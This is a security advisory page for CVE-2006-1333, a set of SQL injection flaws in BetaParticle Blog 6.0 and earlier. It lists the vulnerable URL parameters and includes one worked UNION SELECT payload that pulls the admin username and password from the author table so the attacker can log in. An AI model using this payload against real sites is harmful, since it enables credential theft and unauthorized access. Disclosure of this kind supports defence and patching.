|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 600 CVE : CVE-2006-1333 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : nukedx Published : 20.03.2006
Advisory Content : --Security Report-- Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection Vulnerabilities --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 18/03/06 05:27 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: BetaParticle (http://www.betaparticle.com/) Version: 6.0 and prior versions must be affected. About: Via this method remote attacker can inject arbitrary SQL query. Level: Critical --- How&Example: GET -> http://[site]/bpdir/template_permalink.asp?id=[SQLQuery] GET -> http://[site]/bpdir/template_gallery_detail.asp?fldGalleryID=[SQLQuery] Example -> http://[site]/bpdir/template_gallery_detail.asp?fldGalleryID=-1+UNION+SE LECT+null,fldAuthorUsername ,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1 With this example remote attacker could get admin's pass and can login from /main.asp -- Timeline: * 18/03/2006: Vulnerability found. * 18/03/2006: Contacted with vendor and waiting reply. --- Exploit: Click here and get exploit for this advisory ---  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |